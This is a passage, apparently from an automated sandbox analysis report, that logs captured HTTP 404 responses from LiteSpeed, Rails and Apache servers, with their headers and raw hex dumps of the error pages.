31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 27 May 2024 10:35:00 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 79a5c675-0b3b-4edd-85ca-0e1298f8c6acx-runtime: 0.035627content-length: 18201connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 431f0c0c-0669-4d9d-b651-95d48a5a0839x-runtime: 0.033628content-length: 18221connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: fb8f3bc5-976b-429d-b4db-f4281f33cc3cx-runtime: 0.029723content-length: 19233connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:15 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:17 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:20 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:22 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 